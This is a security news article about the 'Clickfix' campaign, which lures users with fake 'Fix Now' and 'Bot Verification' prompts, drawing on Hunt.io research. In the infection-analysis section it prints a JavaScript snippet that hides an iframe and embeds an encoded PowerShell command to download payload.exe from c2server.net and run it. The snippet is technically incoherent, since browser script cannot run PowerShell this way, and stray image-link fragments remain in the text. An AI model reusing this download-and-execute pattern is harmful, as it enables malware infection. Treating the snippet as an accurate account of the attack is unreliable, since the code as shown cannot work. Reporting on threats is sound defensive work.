A sophisticated malware campaign dubbed “Clickfix” has emerged, targeting users through deceptive browser notifications and pop-ups that prompt immediate action through “Fix Now” and “Bot Verification” buttons.
When triggered, these seemingly harmless prompts initiate a multi-stage infection chain that deploys persistent malware capable of credential theft, keylogging, and remote access functionality.
Security researchers have observed this campaign primarily targeting financial institutions and e-commerce users, with the malware authors employing increasingly sophisticated social engineering tactics to bypass standard security measures.
.png
)
The campaign typically begins with compromised websites or malicious advertisements that generate convincing error messages or security alerts.
These alerts claim that the user’s device has been infected or requires verification, creating a false sense of urgency that prompts victims to click the deceptive buttons.
The design of these notifications closely mimics legitimate browser warnings or security messages, making even security-conscious users vulnerable to the deception.
Once clicked, the malicious JavaScript executes and initiates the download of seemingly benign files that serve as the initial stage of the attack chain.
Hunt.io researchers identified this campaign in early March, noting its rapid evolution and spread across multiple regions.
“What makes Clickfix particularly concerning is its ability to tailor lures based on user behavior and browser language settings,” explained senior Hunt.io analyst Maria Chen.
The malware employs a complex obfuscation technique that helps it evade traditional detection methods.
Initial payloads appear innocuous, often masquerading as PDF documents or system utilities. However, these files contain embedded PowerShell commands that execute when opened, establishing persistence and downloading the main malware components from command and control servers.
Analysis of infected systems reveals that Clickfix creates multiple redundant persistence mechanisms, making complete removal challenging without specialized tools.
Once established, the malware begins harvesting sensitive information while maintaining a low system footprint to avoid detection.
Researchers have observed it targeting stored passwords, cryptocurrency wallets, and financial credentials while also implementing keylogging functionality to capture additional sensitive information.
Infection Mechanism Analysis
The infection sequence begins when users click the malicious “Fix Now” or “Bot Verification” buttons, triggering obfuscated JavaScript that evaluates to the following payload:-
function dL(src) {
const e = document.createElement('iframe');
e.setAttribute('src', src);
e.style.display = 'none';
document.body.appendChild(e);
setTimeout(() => {
const ps = document.createElement('script');
ps.innerHTML = `powershell -w hidden -e ${btoa('Invoke-WebRequest -Uri "https://c2server.net/payload.exe" -OutFile "$env:TEMP\\update.exe"; Start-Process "$env:TEMP\\update.exe"')}`;
document.body.appendChild(ps);
}, 3000);
}
dL('hxxps://malicious-cdn.com/fake-update.html');This code creates a hidden iframe and then executes an encoded PowerShell command that downloads and executes the main malware payload.
.webp)
The malware authors frequently rotate their command and control infrastructure, with Hunt.io tracking over 38 unique domains used in the past month alone.
The rapid infrastructure rotation, combined with fileless execution techniques and living-off-the-land binaries, creates significant challenges for traditional security tools.
Security experts recommend implementing robust browser security policies, keeping systems updated, and employing advanced endpoint protection solutions capable of detecting behavioral anomalies rather than relying solely on signature-based detection to protect against this evolving threat.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
